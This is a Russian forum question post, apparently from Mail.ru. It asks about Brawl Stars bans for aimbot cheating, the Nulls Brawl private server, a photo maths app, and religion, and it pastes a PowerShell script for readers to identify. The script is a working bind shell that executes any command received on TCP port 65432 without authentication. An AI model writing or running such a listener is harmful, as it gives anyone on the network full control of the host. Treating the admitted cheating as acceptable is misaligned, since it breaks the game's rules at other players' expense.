Когда меня забанят в Brawl Stars и ещё пару вопросов

  1. я играю в бравл старс с читами (не реклама) когда меня забанят? читы не визуал, автоаим как у явного читера автоманс явно не человеческий ну и играю уже 2 дня, если вовремя брошу играть с читами меня не забанят?

  2. также я играю в нюльс бравл (не реклама) ну там цензуры никакой нет и пиши где и что хочешь, я узнал что у нюльса есть какие-то правила там и задал сам себе вопрос "могут ли забанить в нюльсе?" может вас банили в Nulls Brawl? если да то почему, мне кажется там забанят только если фсб узнают про криминальные сделки в комнатах в нюльсе.

  3. можно найти переменную f(x) если там выражения без f и без x да и вообще без =, пример скидывать и писать не буду (там не для слабонервных) я попробую скачать программу которая там по фото пример решает, одноклассники пользуются а я нет, что за программа (как называется)?

  4. в какого бога вы верите? если в пуджа то почему?

  5. предположите что за язык и что делает

  6. $listener = [System.Net.Sockets.TcpListener]::new([System.Net.IPAddress]::Any, 65432)

  7. $listener.Start()

  8. Write-Host "Server started, waiting for connection..."

  9. while ($true) {

  10. $client = $listener.AcceptTcpClient()

  11. $stream = $client.GetStream()

  12. $reader = [System.IO.StreamReader]::new($stream)

  13. $writer = [System.IO.StreamWriter]::new($stream)

  14. $writer.AutoFlush = $true

  15. Write-Host "Connection established!"

  16. while ($true) {

  17. $command = $reader.ReadLine()

  18. if ($command -eq "exit") {

  19. Write-Host "Shutting down server..."

  20. break 2

  21. } elseif ($command) {

  22. Write-Host "Executing command: $command"

  23. try {

  24. $output = Invoke-Expression $command 2>&1

  25. $writer.WriteLine($output)

  26. } catch {

  27. $writer.WriteLine($_)

  28. }

  29. }

  30. }

  31. $client.Close()

  32. }

  33. $listener.Stop()

  34. на ссылки не переходите они случайные( там были пропуски строк но мыло ру не разрешило пустые строки сделать)список в коде случаен, лень убирать.

Блокировку аккаунта в игре можно получить, если вы нарушите правила Supercell. Есть 2 типа блокировок: временная и навсегда (перманентная). Они выдаются в зависимости от масштабов нарушения. Здесь вы узнаете, за что можно получить блокировку аккаунта в игре.